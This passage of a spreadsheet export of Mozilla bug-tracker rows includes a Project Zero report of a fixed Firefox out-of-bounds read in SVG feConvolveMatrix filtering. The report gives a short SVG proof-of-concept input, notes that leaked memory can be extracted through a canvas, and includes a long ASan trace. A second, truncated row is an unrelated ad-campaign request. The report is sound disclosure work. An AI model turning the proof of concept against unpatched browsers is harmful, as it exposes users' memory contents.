  0x0c1a800101f0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1a80010200: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
=&gt;0x0c1a80010210: fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd
  0x0c1a80010220: fd fd fd fa fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c1a80010230: 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa
  0x0c1a80010240: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c1a80010250: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c1a8001026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503==ABORTING</t>
        </is>
      </c>
      <c r="X3393" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3394">
      <c r="A3394" t="n">
        <v>1347617</v>
      </c>
      <c r="B3394" t="inlineStr">
        <is>
          <t>2017-03-15 09:14:07 -0700</t>
        </is>
      </c>
      <c r="C3394" t="inlineStr">
        <is>
          <t>Memory disclosure in ConvolvePixel</t>
        </is>
      </c>
      <c r="D3394" t="inlineStr">
        <is>
          <t>2017-09-25 03:05:02 -0700</t>
        </is>
      </c>
      <c r="E3394" t="n">
        <v>1</v>
      </c>
      <c r="F3394" t="n">
        <v>1</v>
      </c>
      <c r="G3394" t="n">
        <v>3</v>
      </c>
      <c r="H3394" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3394" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3394" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K3394" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3394" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3394" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3394" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3394" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3394" t="inlineStr">
        <is>
          <t>[Disclosure deadline: June 15][post-critsmash-triage][adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q3394" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3394" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3394" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3394" t="n">
        <v>1</v>
      </c>
      <c r="U3394" t="n">
        <v>0</v>
      </c>
      <c r="V3394" t="n">
        <v>38</v>
      </c>
      <c r="W3394" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Steps to reproduce:
There is an out of bound read leading to memory disclosure in Firefox. The vulnerability was confirmed on the nightly ASan build. 
Please note: This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
With any fix, please give credit for identifying the vulnerability to Ivan Fratric of Google Project Zero.
PoC:
=================================================================
&lt;svg filter="url(#f)"&gt;
&lt;filter id="f" filterRes="19" filterUnits="userSpaceOnUse"&gt;
&lt;feConvolveMatrix kernelMatrix="1 1 1 1 1 1 1 1 1" kernelUnitLength="1 -1" /&gt;
=================================================================
Preliminary analysis:
The problem seems to be the negative krenel unit length. This leads to an out-of-bound access in ConvolvePixel() and out-of-bounds data is going to be copied into the SVG image. From there, it can be extracted by an attacker by loading the SVG image into a canvas element.
ASan log:
=================================================================
==25524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f8cd2946336 at pc 0x7f8d3fcd397e bp 0x7ffc051ca390 sp 0x7ffc051ca388
READ of size 1 at 0x7f8cd2946336 thread T0
    #0 0x7f8d3fcd397d in ColorComponentAtPoint /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2293:10
    #1 0x7f8d3fcd397d in ConvolvePixel&lt;int&gt; /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2358
    #2 0x7f8d3fcd397d in already_AddRefed&lt;mozilla::gfx::DataSourceSurface&gt; mozilla::gfx::FilterNodeConvolveMatrixSoftware::DoRender&lt;int&gt;(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, int, int) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2509
    #3 0x7f8d3fcd089a in mozilla::gfx::FilterNodeConvolveMatrixSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2379:12
    #4 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
    #5 0x7f8d3fcb85d9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28:25
    #6 0x7f8d3fce4035 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3140:10
    #7 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
    #8 0x7f8d3fcb85d9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28:25
    #9 0x7f8d3fce4895 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3197:5
    #10 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
    #11 0x7f8d3fcb85d9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28:25
    #12 0x7f8d3fcc7832 in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:1781:5
    #13 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
    #14 0x7f8d3fcb85d9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28:25
    #15 0x7f8d3fce4685 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3168:5
    #16 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
    #17 0x7f8d3fc7cb43 in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:580:14
    #18 0x7f8d3fd8bc6e in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, nsTArray&lt;RefPtr&lt;mozilla::gfx::SourceSurface&gt; &gt;&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:8
    #19 0x7f8d44ccc3fd in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:545:3
    #20 0x7f8d44ccb7ee in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&amp;, nsSVGFilterPaintCallback*, nsRegion const*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:81:19
    #21 0x7f8d44d09f72 in nsSVGIntegrationUtils::PaintFilter(nsSVGIntegrationUtils::PaintFramesParams const&amp;) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1094:5
    #22 0x7f8d44f7e9bd in PaintAsLayer /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:8330:30
    #23 0x7f8d44f7e9bd in PaintInactiveLayer /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:3722
    #24 0x7f8d44f7e9bd in mozilla::FrameLayerBuilder::PaintItems(nsTArray&lt;mozilla::FrameLayerBuilder::ClippedDisplayItem&gt;&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6044
    #25 0x7f8d44f819f2 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6233:19
    #26 0x7f8d40034966 in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray&lt;mozilla::layers::ReadbackProcessor::Update&gt;*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:85:5
    #27 0x7f8d40035611 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:139:3
    #28 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29
    #29 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29
    #30 0x7f8d4002fcb7 in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:358:13
    #31 0x7f8d40030527 in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:411:3
    #32 0x7f8d44ff4b51 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2253:17
    #33 0x7f8d447e7554 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3714:12
    #34 0x7f8d446eaf2a in mozilla::PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6489:5
    #35 0x7f8d43f4cff4 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:483:19
    #36 0x7f8d43f4c54f in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:415:33
    #37 0x7f8d43f4faed in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1104:5
    #38 0x7f8d44648596 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2031:11
    #39 0x7f8d44654553 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #40 0x7f8d44654224 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #41 0x7f8d446569c5 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #42 0x7f8d446569c5 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #43 0x7f8d44656bfe in applyImpl&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByConstLRef&lt;mozilla::TimeStamp&gt; , 0&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #44 0x7f8d44656bfe in apply&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #45 0x7f8d44656bfe in mozilla::detail::RunnableMethodImpl&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver*, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #46 0x7f8d3e06238c in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #47 0x7f8d3e05ecb8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #48 0x7f8d3ee06e21 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #49 0x7f8d3ed67980 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #50 0x7f8d3ed67980 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #51 0x7f8d3ed67980 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #52 0x7f8d43fc682f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #53 0x7f8d474273c1 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:30
    #54 0x7f8d475e78ca in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4492:22
    #55 0x7f8d475e9353 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4670:8
    #56 0x7f8d475ea6dc in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4761:21
    #57 0x4eb2b3 in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22
    #58 0x4eb2b3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307
    #59 0x7f8d5914d82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #60 0x41ce08 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41ce08)
0x7f8cd2946336 is located 1226 bytes to the left of 162639-byte region [0x7f8cd2946800,0x7f8cd296e34f)
allocated by thread T0 here:
    #0 0x4bb873 in calloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:72:3
    #1 0x7f8d3fd5a936 in Realloc /home/worker/workspace/build/src/gfx/2d/Tools.h:179:41
    #2 0x7f8d3fd5a936 in mozilla::gfx::SourceSurfaceAlignedRawData::Init(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat, bool, unsigned char, int) /home/worker/workspace/build/src/gfx/2d/SourceSurfaceRawData.cpp:66
    #3 0x7f8d3fc40c98 in mozilla::gfx::Factory::CreateDataSourceSurface(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat, bool) /home/worker/workspace/build/src/gfx/2d/Factory.cpp:878:16
    #4 0x7f8d3fcb1bd7 in mozilla::gfx::GetDataSurfaceInRect(mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::ConvolveMatrixEdgeMode) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:434:5
    #5 0x7f8d3fcb8903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53:15
    #6 0x7f8d3fcd0d8d in already_AddRefed&lt;mozilla::gfx::DataSourceSurface&gt; mozilla::gfx::FilterNodeConvolveMatrixSoftware::DoRender&lt;int&gt;(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, int, int) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2460:5
    #7 0x7f8d3fcd089a in mozilla::gfx::FilterNodeConvolveMatrixSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2379:12
    #8 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
    #9 0x7f8d3fcb85d9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28:25
    #10 0x7f8d3fce4035 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3140:10
    #11 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
    #12 0x7f8d3fcb85d9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28:25
    #13 0x7f8d3fce4895 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3197:5
    #14 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
    #15 0x7f8d3fcb85d9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28:25
    #16 0x7f8d3fcc7832 in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:1781:5
    #17 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
    #18 0x7f8d3fcb85d9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28:25
    #19 0x7f8d3fce4685 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3168:5
    #20 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
    #21 0x7f8d3fc7cb43 in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:580:14
    #22 0x7f8d3fd8bc6e in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, nsTArray&lt;RefPtr&lt;mozilla::gfx::SourceSurface&gt; &gt;&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:8
    #23 0x7f8d44ccc3fd in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:545:3
    #24 0x7f8d44ccb7ee in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&amp;, nsSVGFilterPaintCallback*, nsRegion const*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:81:19
    #25 0x7f8d44d09f72 in nsSVGIntegrationUtils::PaintFilter(nsSVGIntegrationUtils::PaintFramesParams const&amp;) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1094:5
    #26 0x7f8d44f7e9bd in PaintAsLayer /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:8330:30
    #27 0x7f8d44f7e9bd in PaintInactiveLayer /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:3722
    #28 0x7f8d44f7e9bd in mozilla::FrameLayerBuilder::PaintItems(nsTArray&lt;mozilla::FrameLayerBuilder::ClippedDisplayItem&gt;&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6044
    #29 0x7f8d44f819f2 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6233:19
    #30 0x7f8d40034966 in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray&lt;mozilla::layers::ReadbackProcessor::Update&gt;*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:85:5
    #31 0x7f8d40035611 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:139:3
    #32 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2293:10 in ColorComponentAtPoint
Shadow bytes around the buggy address:
  0x0ff21a520c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff21a520c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff21a520c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff21a520c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff21a520c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0ff21a520c60: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa
  0x0ff21a520c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff21a520c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff21a520c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff21a520ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff21a520cb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5524==ABORTING</t>
        </is>
      </c>
      <c r="X3394" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3395">
      <c r="A3395" t="n">
        <v>1201751</v>
      </c>
      <c r="B3395" t="inlineStr">
        <is>
          <t>2015-09-03 17:17:29 -0700</t>
        </is>
      </c>
      <c r="C3395" t="inlineStr">
        <is>
          <t>Tiles Campaign - Yahoo_Content ST_090715</t>
        </is>
      </c>
      <c r="D3395" t="inlineStr">
        <is>
          <t>2015-09-04 07:32:29 -0700</t>
        </is>
      </c>
      <c r="E3395" t="n">
        <v>1</v>
      </c>
      <c r="F3395" t="n">
        <v>1</v>
      </c>
      <c r="G3395" t="n">
        <v>6</v>
      </c>
      <c r="H3395" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3395" t="inlineStr">
        <is>
          <t>Content Services Graveyard</t>
        </is>
      </c>
      <c r="J3395" t="inlineStr">
        <is>
          <t>Tiles</t>
        </is>
      </c>
      <c r="K3395" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3395" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3395" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3395" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3395" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3395" t="inlineStr"/>
      <c r="Q3395" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3395" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3395" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3395" t="n">
        <v>1</v>
      </c>
      <c r="U3395" t="n">
        <v>0</v>
      </c>
      <c r="V3395" t="n">
        <v>2</v>
      </c>
      <c r="W3395" t="inlineStr">
        <is>
          <t>Hi Nan,
Here is the new set of Yahoo Content tiles. This are to go live on Monday
Sept 7th.
Client: Yahoo
Campaign: Yahoo_Content ST_090715
Flight date: 9/7/2015 - 9/13/2015
Cover Image and Rollover Image: See Doc:
https://drive.google.com/drive/u/1/folders/0B-KNrfE6kA03fnZoc2lIam5fczBUVU45VWg2aXVHbkJ2OFFFX1pBWFYxREdBT25tWWVrTUE
Category and URL: See Doc:
